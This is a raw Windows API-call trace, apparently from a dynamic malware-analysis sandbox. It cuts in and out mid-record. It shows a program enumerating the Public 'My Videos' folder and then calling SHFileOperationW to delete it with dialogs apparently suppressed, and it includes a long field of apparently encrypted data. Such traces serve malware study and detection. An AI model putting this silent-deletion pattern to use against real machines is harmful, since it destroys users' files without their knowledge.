lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x48) returned 0x2499760 [0267.699] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x8bedfc*="My Videos") returned 0x23 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499760 | out: hHeap=0x25c0000) returned 1 [0267.699] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Videos" (normalized: "c:\\users\\public\\documents\\my videos")) returned 0x2416 [0267.699] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x246d870, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x246d860, ftLastAccessTime.dwLowDateTime=0x246d858, ftLastAccessTime.dwHighDateTime=0x8bf054, ftLastWriteTime.dwLowDateTime=0x76c314dd, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="", cAlternateFileName="\x519\x77aa\xf1fc\x8b\x2860\x02\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\x5c\x55\x73\x65\x72\x73\x5c\x50\x75\x62\x6c\x69\x63\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x5c\x4d\x79\x20\x56\x69\x64\x65\x6f\x73\x5c")) returned 0xffffffff [0267.699] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0267.699] GetLastError () returned 0x6 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.700] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0267.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x48) returned 0x2499760 [0267.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x8bf658*="My Videos") returned 0x23 [0267.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499760 | out: hHeap=0x25c0000) returned 1 [0267.705] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Videos" (normalized: "c:\\users\\public\\documents\\my videos")) returned 0x2416 [0267.705] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1